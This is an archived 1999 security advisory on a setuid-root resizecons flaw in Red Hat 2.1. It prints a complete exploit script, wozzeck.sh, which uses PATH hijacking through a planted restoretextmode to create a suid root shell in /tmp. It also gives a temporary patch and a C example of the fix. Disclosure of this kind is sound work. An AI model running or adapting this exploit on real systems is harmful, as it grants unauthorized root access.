resizecons.sh

17 Aug 1999. Reported by Packet Storm. Type: packetstorm. Source: packetstormsecurity.com

A security flaw in Red Hat 2.1 allows arbitrary command execution as root via the setuid-root resizecons program.

` There is a security hole in Red Hat 2.1, which installs the program  
/usr/bin/resizecons suid root. The resizecons program allows a user  
to change the video mode of the console. During this process, it runs  
the program restoretextmode without an absolute pathname, assuming the  
correct version will be found in the path, while running with root  
privileges. It then executes setfont in the same manner. By setting  
the path to find a rogue restoretextmode, a user can execute an arbitrary  
program as root.  
  
As a more amusing aside, the file /tmp/selection.pid is read and the  
pid contained within is sent a SIGWINCH, allowing a user on the system  
to force a screen redraw in an arbitrary process (one that handles  
SIGWINCH) on the machine.  
  
If /usr/bin/resizecons needs to be run by users other than root at the  
console, provisions need to be made in the code to execute the outside  
utilities with absolute pathnames, and to check access rights on files  
before opening.  
  
Program: /usr/bin/resizecons  
Affected Operating Systems: Red Hat 2.1 linux distribution  
Requirements: account on system  
Temporary Patch: chmod -s /usr/bin/resizecons  
Security Compromise: root  
Author: Dave M. ([email protected])  
Synopsis: resizecons runs restoretextmode without an  
    absolute pathname while executing as root,  
    allowing a user to substitute the real  
    program with arbitrary commands.  
  
Exploit:  
  
wozzeck.sh:  
#!/bin/sh  
#  
# wozzeck.sh  
# exploits a security hole in /usr/bin/resizecons   
# to create a suid root shell in /tmp/wozz on a   
# linux Red Hat 2.1 system.  
#  
# by Dave M. ([email protected])  
#   
echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system  
echo ================ Checking system vulnerability  
if test -u /usr/bin/resizecons  
then  
echo ++++++++++++++++ System appears vulnerable.  
cd /tmp  
cat << _EOF_ > /tmp/313x37  
This exploit is dedicated to   
Wozz. Use it with care.  
_EOF_  
cat << _EOF_ > /tmp/restoretextmode  
#!/bin/sh  
/bin/cp /bin/sh /tmp/wozz  
/bin/chmod 4777 /tmp/wozz  
_EOF_  
/bin/chmod +x /tmp/restoretextmode  
PATH=/tmp  
echo ================ Executing resizecons  
/usr/bin/resizecons 313x37  
/bin/rm /tmp/restoretextmode  
/bin/rm /tmp/313x37  
if test -u /tmp/wozz  
then  
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz  
else  
echo ---------------- Exploit failed  
fi  
else  
echo ---------------- This machine does not appear to be vulnerable.  
fi  
  
  
  
  
`
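
The advisory's recommended fix (run outside utilities by absolute pathname) can be sketched in C as below. This is an added example, not code from resizecons or from the advisory's author; the function names and the helper path in `main` are assumptions, since the page does not say where restoretextmode is installed.

```c
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for every helper; nothing is inherited from the caller. */
static char *const CLEAN_ENV[] = { "PATH=/bin:/usr/bin", NULL };

/* Accept only an absolute path to a regular file that is owned by root
 * and not writable by group or others. */
int helper_is_trusted(const char *path)
{
    struct stat st;
    if (path == NULL || path[0] != '/') return 0; /* relative: PATH decides */
    if (stat(path, &st) != 0) return 0;
    if (!S_ISREG(st.st_mode)) return 0;
    if (st.st_uid != 0) return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return 0;
    return 1;
}

/* fork + execve (not execvp or system, which search PATH) with CLEAN_ENV.
 * Returns the helper's exit status, or -1 on failure. */
int spawn_clean(const char *path, char *const argv[])
{
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(path, argv, CLEAN_ENV);
        _exit(127); /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Policy check first, then the clean spawn. */
int run_helper(const char *path, char *const argv[])
{
    if (!helper_is_trusted(path)) return -1;
    return spawn_clean(path, argv);
}

int main(void)
{
    /* Placeholder path (assumption): substitute the real install location. */
    char *const args[] = { "restoretextmode", NULL };
    return run_helper("/usr/sbin/restoretextmode", args) == 0 ? 0 : 1;
}
```

The `stat` check and the later `execve` are separate system calls, so the check only has value when every directory on the helper's path is itself writable by root alone.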
